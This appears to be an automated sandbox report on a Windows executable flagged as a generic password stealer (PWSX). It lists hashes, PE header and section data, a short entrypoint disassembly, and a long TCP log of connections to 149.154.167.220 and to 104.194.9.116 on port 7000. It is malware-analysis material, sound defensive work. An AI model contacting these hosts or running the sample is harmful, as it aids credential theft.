                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                          File name:SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe
                                                                                                                                                                                          File size:466'528 bytes
                                                                                                                                                                                          MD5:c8d9593196962fa5d706a207c16674cd
                                                                                                                                                                                          SHA1:686a8e674e6615d5cd91f7b2cba0c755054b3f69
                                                                                                                                                                                          SHA256:a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d
                                                                                                                                                                                          SHA512:5ddae80780c6091bfe0ab5e29bc63732c08ce34f677fc341366dcecf6db9e1bd2e0ed24cfe57eface0d19c6f46010f47eb2d74888b91a503dae00651c4a756bf
                                                                                                                                                                                          SSDEEP:12288:XcTpGLwWpFGIWFfDtaY4S0LEy7w0iymL/:XOpEwiFYxsEyHiyK
                                                                                                                                                                                          TLSH:57A40228B3EC5977C7DF127974B4A0918B75FBA77222CB8F4810854E2857BC14B62B23
                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....5..........."...0.................. ....@...... .......................`............`................................

                                                                                                                                                                                          File Icon

                                                                                                                                                                                          Icon Hash:00928e8e8686b000

                                                                                                                                                                                          Static PE Info

                                                                                                                                                                                          General

                                                                                                                                                                                          Entrypoint:0x400000
                                                                                                                                                                                          Entrypoint Section:
                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                          Time Stamp:0xDF358803 [Tue Aug 31 21:49:55 2088 UTC]
                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                          OS Version Major:4
                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                          File Version Major:4
                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                          Import Hash:

                                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                                          Instruction
                                                                                                                                                                                          dec ebp
                                                                                                                                                                                          pop edx
                                                                                                                                                                                          nop
                                                                                                                                                                                          add byte ptr [ebx], al
                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                          add byte ptr [eax+eax], al
                                                                                                                                                                                          add byte ptr [eax], al

                                                                                                                                                                                          Data Directories

                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x140000xb24.rsrc
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x13de40x38.text
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                          Sections

                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                          .text0x20000x11e920x120005fc1705fb501111d36af4e150f59ed5cFalse0.4556342230902778data5.908919730657008IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                          .rsrc0x140000xb240xc00fc2c9d36c7b43df4b7510b16135f70f7False0.28515625data4.258925842186996IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                          Resources

                                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                          RT_VERSION0x140b80x440data0.48161764705882354
                                                                                                                                                                                          RT_VERSION0x144f80x440dataEnglishUnited States0.4834558823529412
                                                                                                                                                                                          RT_MANIFEST0x149380x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                                                                          Possible Origin

                                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                          EnglishUnited States

                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                                          TCP Packets

                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                          Mar 28, 2024 10:25:24.785566092 CET49674443192.168.2.7104.98.116.138
                                                                                                                                                                                          Mar 28, 2024 10:25:24.785772085 CET49675443192.168.2.7104.98.116.138
                                                                                                                                                                                          Mar 28, 2024 10:25:24.926160097 CET49672443192.168.2.7104.98.116.138
                                                                                                                                                                                          Mar 28, 2024 10:25:29.522496939 CET49704443192.168.2.7149.154.167.220
                                                                                                                                                                                          Mar 28, 2024 10:25:29.522533894 CET44349704149.154.167.220192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:29.522608042 CET49704443192.168.2.7149.154.167.220
                                                                                                                                                                                          Mar 28, 2024 10:25:29.532279968 CET49704443192.168.2.7149.154.167.220
                                                                                                                                                                                          Mar 28, 2024 10:25:29.532305002 CET44349704149.154.167.220192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:30.089720011 CET44349704149.154.167.220192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:30.089833021 CET49704443192.168.2.7149.154.167.220
                                                                                                                                                                                          Mar 28, 2024 10:25:30.092643976 CET49704443192.168.2.7149.154.167.220
                                                                                                                                                                                          Mar 28, 2024 10:25:30.092655897 CET44349704149.154.167.220192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:30.092924118 CET44349704149.154.167.220192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:30.144906998 CET49704443192.168.2.7149.154.167.220
                                                                                                                                                                                          Mar 28, 2024 10:25:30.195413113 CET49704443192.168.2.7149.154.167.220
                                                                                                                                                                                          Mar 28, 2024 10:25:30.240236998 CET44349704149.154.167.220192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:30.644229889 CET44349704149.154.167.220192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:30.644303083 CET44349704149.154.167.220192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:30.644341946 CET49704443192.168.2.7149.154.167.220
                                                                                                                                                                                          Mar 28, 2024 10:25:30.655808926 CET49704443192.168.2.7149.154.167.220
                                                                                                                                                                                          Mar 28, 2024 10:25:33.191771030 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                          Mar 28, 2024 10:25:34.394931078 CET49674443192.168.2.7104.98.116.138
                                                                                                                                                                                          Mar 28, 2024 10:25:34.394965887 CET49675443192.168.2.7104.98.116.138
                                                                                                                                                                                          Mar 28, 2024 10:25:34.535538912 CET49672443192.168.2.7104.98.116.138
                                                                                                                                                                                          Mar 28, 2024 10:25:35.682645082 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:35.795536041 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:35.795717955 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:35.826150894 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:35.996056080 CET44349701104.98.116.138192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:35.996148109 CET49701443192.168.2.7104.98.116.138
                                                                                                                                                                                          Mar 28, 2024 10:25:36.007473946 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:37.835289001 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:37.835314035 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:37.835329056 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:37.835344076 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:37.835385084 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:37.835405111 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:37.835412025 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:37.835541964 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:37.835578918 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:37.835581064 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:37.835639954 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:37.835675001 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:37.835711002 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:37.835761070 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:37.835799932 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:37.957760096 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:37.957778931 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:37.957793951 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:37.957847118 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:37.957861900 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:37.957865000 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:37.957875013 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:37.957889080 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:37.957905054 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:37.957928896 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:37.957937956 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:37.957942963 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:37.957967997 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:37.957992077 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:37.958025932 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:37.958039045 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:37.958054066 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:37.958091974 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:37.958120108 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:37.958183050 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:37.958234072 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:37.958237886 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:37.958273888 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:37.958312988 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:37.958370924 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:37.958460093 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:37.958501101 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:37.958606005 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:37.958645105 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:37.958684921 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079298019 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079314947 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079339981 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079382896 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079401016 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079401970 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079417944 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079449892 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079457045 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079464912 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079484940 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079492092 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079518080 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079555035 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079569101 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079581976 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079597950 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079619884 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079621077 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079636097 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079678059 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079679012 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079693079 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079720974 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079730034 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079740047 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079770088 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079786062 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079802036 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079828978 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079842091 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079843998 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079875946 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079916954 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079932928 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079946995 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079972982 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.079987049 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.080025911 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.080049992 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.080065012 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.080094099 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.080107927 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.080108881 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.080142975 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.080144882 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.080169916 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.080212116 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.080214977 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.080246925 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.080260992 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.080274105 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.080288887 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.080290079 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.080306053 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.080360889 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.080374956 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.080415964 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.129295111 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190004110 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190076113 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190093040 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190114021 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190121889 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190135002 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190150976 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190155983 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190170050 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190186977 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190195084 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190222979 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190228939 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190243959 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190263033 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190279007 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190304995 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190318108 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190330029 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190341949 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190365076 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190378904 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190406084 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190424919 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190443039 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190445900 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190464020 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190483093 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190511942 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190551996 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190572977 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190586090 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190618038 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190619946 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190633059 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190649033 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190668106 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190674067 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190702915 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190718889 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190767050 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190785885 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190799952 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190804958 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190814018 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190834045 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190834999 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190866947 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190876007 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190918922 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190932035 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190944910 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190953016 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.190979004 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.191001892 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.191016912 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.191044092 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.230947971 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.271552086 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.316582918 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.316617012 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.316632986 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.316646099 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.316683054 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.316703081 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.316739082 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.316756010 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.316760063 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.316761017 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.316761017 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.316797972 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.316808939 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.316828012 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.316845894 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.316864967 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.316868067 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.316879034 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.316905022 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.316936016 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.316972017 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.316975117 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.316988945 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.317022085 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.317027092 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.317070007 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.317109108 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.317116022 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.317186117 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.317224026 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.330446005 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.330487967 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.330504894 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.330538988 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.330712080 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.330771923 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.330775023 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.331099033 CET700049713104.194.9.116192.168.2.7
                                                                                                                                                                                          Mar 28, 2024 10:25:38.331142902 CET497137000192.168.2.7104.194.9.116
                                                                                                                                                                                          Mar 28, 2024 10:25:38.331296921 CET700049713104.194.9.116192.168.2.7
